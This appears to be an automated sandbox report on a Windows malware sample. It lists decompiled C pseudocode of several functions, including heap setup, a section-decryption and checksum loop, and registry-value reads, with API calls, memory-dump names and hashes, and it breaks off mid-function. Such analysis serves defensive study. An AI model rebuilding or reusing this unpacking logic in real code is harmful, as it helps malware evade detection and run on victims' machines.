                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                                                                                                                                                              • String ID: Clie
                                                                                                                                                                                              • API String ID: 3817122888-1624203186
                                                                                                                                                                                              • Opcode ID: 6cc8519cd14b51909950c7888659a2226d7fe435f3344636711293ffd5ebf943
                                                                                                                                                                                              • Instruction ID: 9c0a232232191d36ff4899f7f7c9180a7f1dc14b5ae4b0cfabdf7a07bf4dc71e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cc8519cd14b51909950c7888659a2226d7fe435f3344636711293ffd5ebf943
                                                                                                                                                                                              • Instruction Fuzzy Hash: DC418C72204349AFC710AFA4DC859BBB7EDEF84704F06CA2ABB94D6511D671DC048BB2
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(80000002), ref: 00DF5057
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00DFA6F4), ref: 00DF509B
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DF50AF
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DF50BD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: 075420fb1edc784feaa8d76779025a26a9e9a2b4a7f5adf39fc32f099d48944e
                                                                                                                                                                                              • Instruction ID: 3ea84e2af7fc72cebc7d440a85ed9a29739178f1e05dbfe1b57ed2f9de89a482
                                                                                                                                                                                              • Opcode Fuzzy Hash: 075420fb1edc784feaa8d76779025a26a9e9a2b4a7f5adf39fc32f099d48944e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 39310D71910609EFCB04DF98E8848BE7BB9FF48340B25C46AEA05DB251EB719941CBB5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E00A81B6F(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				unsigned int _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                              				intOrPtr* _v36;
                                                                                                                                                                                              				void* _v40;
                                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                                              				signed int _v52;
                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                              				intOrPtr _t78;
                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t78 =  *0xa84130;
                                                                                                                                                                                              				_t42 = E00A81C8A(_t78,  &_v24,  &_v16);
                                                                                                                                                                                              				_v20 = _t42;
                                                                                                                                                                                              				if(_t42 == 0) {
                                                                                                                                                                                              					asm("sbb ebx, ebx");
                                                                                                                                                                                              					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                                                                                                                                                              					_t79 = _t78 + _v24;
                                                                                                                                                                                              					_v40 = _t79;
                                                                                                                                                                                              					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                              					_v28 = _t49;
                                                                                                                                                                                              					if(_t49 == 0) {
                                                                                                                                                                                              						_v20 = 8;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              						if(_t61 <= 0) {
                                                                                                                                                                                              							_t50 =  *0xa84140;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t53 = _t49 - _t79;
                                                                                                                                                                                              							_v32 = _t53;
                                                                                                                                                                                              							_v36 = _t53 + _a4 + 0xa851a2;
                                                                                                                                                                                              							_v12 = _t79;
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                              								asm("rol edx, cl");
                                                                                                                                                                                              								E00A81908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
                                                                                                                                                                                              								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
                                                                                                                                                                                              								_v8 = _v8 + 1;
                                                                                                                                                                                              								_v12 = _v12 + 0x1000;
                                                                                                                                                                                              								 *0xa84140 = _t50;
                                                                                                                                                                                              								if(_v8 >= _t61) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t53 = _v32;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t50 != 0x59935a40) {
                                                                                                                                                                                              							_v20 = 0xc;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							memcpy(_v40, _v28, _v16);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						VirtualFree(_v28, 0, 0x8000); // executed
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v20;
                                                                                                                                                                                              			}





















                                                                                                                                                                                              0x00a81b76
                                                                                                                                                                                              0x00a81b86
                                                                                                                                                                                              0x00a81b8b
                                                                                                                                                                                              0x00a81b90
                                                                                                                                                                                              0x00a81ba5
                                                                                                                                                                                              0x00a81bac
                                                                                                                                                                                              0x00a81bb1
                                                                                                                                                                                              0x00a81bc2
                                                                                                                                                                                              0x00a81bc5
                                                                                                                                                                                              0x00a81bcb
                                                                                                                                                                                              0x00a81bd0
                                                                                                                                                                                              0x00a81c7a
                                                                                                                                                                                              0x00a81bd6
                                                                                                                                                                                              0x00a81bd6
                                                                                                                                                                                              0x00a81bdc
                                                                                                                                                                                              0x00a81c42
                                                                                                                                                                                              0x00a81bde
                                                                                                                                                                                              0x00a81be1
                                                                                                                                                                                              0x00a81beb
                                                                                                                                                                                              0x00a81bee
                                                                                                                                                                                              0x00a81bf1
                                                                                                                                                                                              0x00a81bf9
                                                                                                                                                                                              0x00a81c04
                                                                                                                                                                                              0x00a81c05
                                                                                                                                                                                              0x00a81c06
                                                                                                                                                                                              0x00a81c15
                                                                                                                                                                                              0x00a81c1e
                                                                                                                                                                                              0x00a81c28
                                                                                                                                                                                              0x00a81c2b
                                                                                                                                                                                              0x00a81c2e
                                                                                                                                                                                              0x00a81c35
                                                                                                                                                                                              0x00a81c3d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81bf6
                                                                                                                                                                                              0x00a81bf6
                                                                                                                                                                                              0x00a81c3f
                                                                                                                                                                                              0x00a81c4c
                                                                                                                                                                                              0x00a81c61
                                                                                                                                                                                              0x00a81c4e
                                                                                                                                                                                              0x00a81c57
                                                                                                                                                                                              0x00a81c5c
                                                                                                                                                                                              0x00a81c72
                                                                                                                                                                                              0x00a81c72
                                                                                                                                                                                              0x00a81c81
                                                                                                                                                                                              0x00a81c87

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00A81BC5
                                                                                                                                                                                              • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,00A811FF,-00000008), ref: 00A81C57
                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A81C72
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                              • String ID: Dec 1 2020
                                                                                                                                                                                              • API String ID: 4010158826-3539646581
                                                                                                                                                                                              • Opcode ID: ec9afde725b74ef23f6690d19a3e529a3c899c3d431e57fad95a5e40b5a1e1fa
                                                                                                                                                                                              • Instruction ID: 0451431de81529ad4077133d16535bd3b3118d48e004b35f4544cda19da4675c
                                                                                                                                                                                              • Opcode Fuzzy Hash: ec9afde725b74ef23f6690d19a3e529a3c899c3d431e57fad95a5e40b5a1e1fa
                                                                                                                                                                                              • Instruction Fuzzy Hash: F3313BB1E40219EBDF01EF98D885BEEBBB9FF08704F104165E901BB240D771AA06DB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                              			E00DF1295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                              				intOrPtr* _t28;
                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                              				intOrPtr* _t32;
                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                              				int _t46;
                                                                                                                                                                                              				intOrPtr* _t47;
                                                                                                                                                                                              				int _t48;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t47 = __eax;
                                                                                                                                                                                              				_push( &_v12);
                                                                                                                                                                                              				_push(__eax);
                                                                                                                                                                                              				_t39 = 0;
                                                                                                                                                                                              				_t46 = 0; // executed
                                                                                                                                                                                              				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                              				_v8 = _t26;
                                                                                                                                                                                              				if(_t26 < 0) {
                                                                                                                                                                                              					L13:
                                                                                                                                                                                              					return _v8;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_v12 == 0) {
                                                                                                                                                                                              					Sleep(0xc8);
                                                                                                                                                                                              					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_v8 >= _t39) {
                                                                                                                                                                                              					_t28 = _v12;
                                                                                                                                                                                              					if(_t28 != 0) {
                                                                                                                                                                                              						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                              						_v8 = _t31;
                                                                                                                                                                                              						if(_t31 >= 0) {
                                                                                                                                                                                              							_t46 = lstrlenW(_v16);
                                                                                                                                                                                              							if(_t46 != 0) {
                                                                                                                                                                                              								_t46 = _t46 + 1;
                                                                                                                                                                                              								_t48 = _t46 + _t46;
                                                                                                                                                                                              								_t39 = E00DF58BE(_t48);
                                                                                                                                                                                              								if(_t39 == 0) {
                                                                                                                                                                                              									_v8 = 0x8007000e;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__imp__#6(_v16);
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t32 = _v12;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *_a4 = _t39;
                                                                                                                                                                                              					 *_a8 = _t46 + _t46;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L13;
                                                                                                                                                                                              			}














                                                                                                                                                                                              0x00df12a1
                                                                                                                                                                                              0x00df12a5
                                                                                                                                                                                              0x00df12a6
                                                                                                                                                                                              0x00df12a7
                                                                                                                                                                                              0x00df12a9
                                                                                                                                                                                              0x00df12ab
                                                                                                                                                                                              0x00df12ae
                                                                                                                                                                                              0x00df12b3
                                                                                                                                                                                              0x00df134a
                                                                                                                                                                                              0x00df1351
                                                                                                                                                                                              0x00df1351
                                                                                                                                                                                              0x00df12bc
                                                                                                                                                                                              0x00df12c3
                                                                                                                                                                                              0x00df12d3
                                                                                                                                                                                              0x00df12d3
                                                                                                                                                                                              0x00df12d9
                                                                                                                                                                                              0x00df12db
                                                                                                                                                                                              0x00df12e0
                                                                                                                                                                                              0x00df12e9
                                                                                                                                                                                              0x00df12ef
                                                                                                                                                                                              0x00df12f4
                                                                                                                                                                                              0x00df12ff
                                                                                                                                                                                              0x00df1303
                                                                                                                                                                                              0x00df1305
                                                                                                                                                                                              0x00df1306
                                                                                                                                                                                              0x00df130f
                                                                                                                                                                                              0x00df1313
                                                                                                                                                                                              0x00df1324
                                                                                                                                                                                              0x00df1315
                                                                                                                                                                                              0x00df131a
                                                                                                                                                                                              0x00df131f
                                                                                                                                                                                              0x00df132e
                                                                                                                                                                                              0x00df132e
                                                                                                                                                                                              0x00df1303
                                                                                                                                                                                              0x00df1334
                                                                                                                                                                                              0x00df133a
                                                                                                                                                                                              0x00df133a
                                                                                                                                                                                              0x00df1343
                                                                                                                                                                                              0x00df1348
                                                                                                                                                                                              0x00df1348
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1198164300-0
                                                                                                                                                                                              • Opcode ID: 4c4ae10799becab3d9f865c7510d01c3813bc64546fc49e08e0e3d4d1ab6611a
                                                                                                                                                                                              • Instruction ID: e78bc0804e61c53a5a1f175ffc1fe84e08e9f99fe59a2933be4800adcda2257b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c4ae10799becab3d9f865c7510d01c3813bc64546fc49e08e0e3d4d1ab6611a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7213E7990120DEFCB11DFA4D9849EEBBF8FF48304B158169EA05E7210EB70DA41CB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF90A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                              				void* _t5;
                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t16 = __edx;
                                                                                                                                                                                              				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                              				 *0xdfd238 = _t5;
                                                                                                                                                                                              				if(_t5 == 0) {
                                                                                                                                                                                              					_t14 = 8;
                                                                                                                                                                                              					return _t14;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *0xdfd1a8 = GetTickCount();
                                                                                                                                                                                              				_t7 = E00DF6A7F(_a4);
                                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t22 = SwitchToThread() + 8;
                                                                                                                                                                                              						_t10 = E00DF1C04(_a4, _t22);
                                                                                                                                                                                              						Sleep(0x20 + _t22 * 4); // executed
                                                                                                                                                                                              					} while (_t10 == 1);
                                                                                                                                                                                              					if(E00DF9511(_t15) != 0) {
                                                                                                                                                                                              						 *0xdfd260 = 1; // executed
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t13 = E00DF4908(_t16); // executed
                                                                                                                                                                                              					return _t13;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                              			}











                                                                                                                                                                                              0x00df90a1
                                                                                                                                                                                              0x00df90aa
                                                                                                                                                                                              0x00df90b0
                                                                                                                                                                                              0x00df90b7
                                                                                                                                                                                              0x00df90bb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df90bb
                                                                                                                                                                                              0x00df90c8
                                                                                                                                                                                              0x00df90cd
                                                                                                                                                                                              0x00df90d4
                                                                                                                                                                                              0x00df90d8
                                                                                                                                                                                              0x00df90e4
                                                                                                                                                                                              0x00df90e8
                                                                                                                                                                                              0x00df90f7
                                                                                                                                                                                              0x00df90fd
                                                                                                                                                                                              0x00df910b
                                                                                                                                                                                              0x00df910d
                                                                                                                                                                                              0x00df910d
                                                                                                                                                                                              0x00df9117
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9117
                                                                                                                                                                                              0x00df911c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00400000,00000000,00DF6F11,?), ref: 00DF90AA
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00DF90BE
                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,00000001,?), ref: 00DF90D8
                                                                                                                                                                                              • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 00DF90F7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountCreateHeapSleepSwitchThreadTick
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 377297877-0
                                                                                                                                                                                              • Opcode ID: 9091cf7d79e05ae87c4f0aea8ff1e27bd300e4b7edb99987460ccbdb9d5ebdbf
                                                                                                                                                                                              • Instruction ID: ecf2fbdd37525e2041994cfe074b0e823ce838306fa355ea519f5d64f7fdeb78
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9091cf7d79e05ae87c4f0aea8ff1e27bd300e4b7edb99987460ccbdb9d5ebdbf
                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F0C231A0030DBAD7206B74AD19BBAB6A9AB44355F16C021FA04D7351EF30C841CA75
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF68CF() {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              				intOrPtr _t24;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                              				_t23 = E00DF9138(0,  &_v8); // executed
                                                                                                                                                                                              				if(_t23 != 0) {
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t24 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t4 = _t24 + 0xdfede0; // 0x4c09388
                                                                                                                                                                                              				_t5 = _t24 + 0xdfed88; // 0x4f0053
                                                                                                                                                                                              				_t26 = E00DF1B13( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                              				_t45 = _t26;
                                                                                                                                                                                              				if(_t45 == 0) {
                                                                                                                                                                                              					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                              					_t45 = 8;
                                                                                                                                                                                              					if(_v12 < _t45) {
                                                                                                                                                                                              						_t45 = 1;
                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t32 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              						_t11 = _t32 + 0xdfedd4; // 0x4c0937c
                                                                                                                                                                                              						_t48 = _t11;
                                                                                                                                                                                              						_t12 = _t32 + 0xdfed88; // 0x4f0053
                                                                                                                                                                                              						_t51 = E00DF5FCB(_t11, _t12, _t11);
                                                                                                                                                                                              						_t58 = _t51;
                                                                                                                                                                                              						if(_t51 != 0) {
                                                                                                                                                                                              							_t35 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              							_t13 = _t35 + 0xdfea59; // 0x30314549
                                                                                                                                                                                              							if(E00DF75E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                                                                                                                                                                              								_t60 =  *0xdfd25c - 6;
                                                                                                                                                                                              								if( *0xdfd25c <= 6) {
                                                                                                                                                                                              									_t42 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              									_t15 = _t42 + 0xdfec3a; // 0x52384549
                                                                                                                                                                                              									E00DF75E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t38 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              							_t17 = _t38 + 0xdfee18; // 0x4c093c0
                                                                                                                                                                                              							_t18 = _t38 + 0xdfedf0; // 0x680043
                                                                                                                                                                                              							_t45 = E00DF1BC1(_v8, 0x80000001, _t51, _t18, _t17);
                                                                                                                                                                                              							HeapFree( *0xdfd238, 0, _t51);
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _v16);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t53 = _v8;
                                                                                                                                                                                              				if(_v8 != 0) {
                                                                                                                                                                                              					E00DF568A(_t53);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t45;
                                                                                                                                                                                              			}

















                                                                                                                                                                                              0x00df68df
                                                                                                                                                                                              0x00df68e2
                                                                                                                                                                                              0x00df68e9
                                                                                                                                                                                              0x00df68eb
                                                                                                                                                                                              0x00df68eb
                                                                                                                                                                                              0x00df68ee
                                                                                                                                                                                              0x00df68f3
                                                                                                                                                                                              0x00df68fa
                                                                                                                                                                                              0x00df6907
                                                                                                                                                                                              0x00df690c
                                                                                                                                                                                              0x00df6910
                                                                                                                                                                                              0x00df691e
                                                                                                                                                                                              0x00df692c
                                                                                                                                                                                              0x00df6930
                                                                                                                                                                                              0x00df69c1
                                                                                                                                                                                              0x00df69c1
                                                                                                                                                                                              0x00df6936
                                                                                                                                                                                              0x00df6936
                                                                                                                                                                                              0x00df693b
                                                                                                                                                                                              0x00df693b
                                                                                                                                                                                              0x00df6942
                                                                                                                                                                                              0x00df694e
                                                                                                                                                                                              0x00df6950
                                                                                                                                                                                              0x00df6952
                                                                                                                                                                                              0x00df6954
                                                                                                                                                                                              0x00df695b
                                                                                                                                                                                              0x00df696d
                                                                                                                                                                                              0x00df696f
                                                                                                                                                                                              0x00df6976
                                                                                                                                                                                              0x00df6978
                                                                                                                                                                                              0x00df697f
                                                                                                                                                                                              0x00df698a
                                                                                                                                                                                              0x00df698a
                                                                                                                                                                                              0x00df6976
                                                                                                                                                                                              0x00df698f
                                                                                                                                                                                              0x00df6994
                                                                                                                                                                                              0x00df699b
                                                                                                                                                                                              0x00df69b9
                                                                                                                                                                                              0x00df69bb
                                                                                                                                                                                              0x00df69bb
                                                                                                                                                                                              0x00df6952
                                                                                                                                                                                              0x00df69cd
                                                                                                                                                                                              0x00df69cd
                                                                                                                                                                                              0x00df69cf
                                                                                                                                                                                              0x00df69d4
                                                                                                                                                                                              0x00df69d6
                                                                                                                                                                                              0x00df69d6
                                                                                                                                                                                              0x00df69e1

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04C09388,00000000,?,74B5F710,00000000,74B5F730), ref: 00DF691E
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04C093C0,?,00000000,30314549,00000014,004F0053,04C0937C), ref: 00DF69BB
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DF9C10), ref: 00DF69CD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                              • Opcode ID: 602913ceda26c3cc8f5f410181db9a61331763734e8384bd45d59494e1f96a28
                                                                                                                                                                                              • Instruction ID: 95d0f754d1f93b926660c9f6d0d290c7b60eae97355acee203ab43e1c788b075
                                                                                                                                                                                              • Opcode Fuzzy Hash: 602913ceda26c3cc8f5f410181db9a61331763734e8384bd45d59494e1f96a28
                                                                                                                                                                                              • Instruction Fuzzy Hash: 89316331A0021DBFDB11EB94DD48EBA77BEEF04700F168095B6049B621D771DA45DBB0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                                                              			E00DF9F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                              				void* _t44;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t37 = __edx;
                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t43 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_push(0x800);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( *0xdfd238);
                                                                                                                                                                                              				_t1 = _t43 + 0xdfe791; // 0x6976612e
                                                                                                                                                                                              				_t44 = _t1;
                                                                                                                                                                                              				if( *0xdfd24c >= 5) {
                                                                                                                                                                                              					if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						_t31 = 8;
                                                                                                                                                                                              						L7:
                                                                                                                                                                                              						if(_t31 != 0) {
                                                                                                                                                                                              							L10:
                                                                                                                                                                                              							 *0xdfd24c =  *0xdfd24c + 1;
                                                                                                                                                                                              							L11:
                                                                                                                                                                                              							return _t31;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t46 = _a4;
                                                                                                                                                                                              						_t41 = _v8;
                                                                                                                                                                                              						 *_a16 = _a4;
                                                                                                                                                                                              						 *_a20 = E00DF7CF7(_a4, _t41); // executed
                                                                                                                                                                                              						_t19 = E00DF60CF(_t41, _t41, _t46); // executed
                                                                                                                                                                                              						if(_t19 != 0) {
                                                                                                                                                                                              							 *_a8 = _t41;
                                                                                                                                                                                              							 *_a12 = _t19;
                                                                                                                                                                                              							if( *0xdfd24c < 5) {
                                                                                                                                                                                              								 *0xdfd24c =  *0xdfd24c & 0x00000000;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L11;
                                                                                                                                                                                              						}
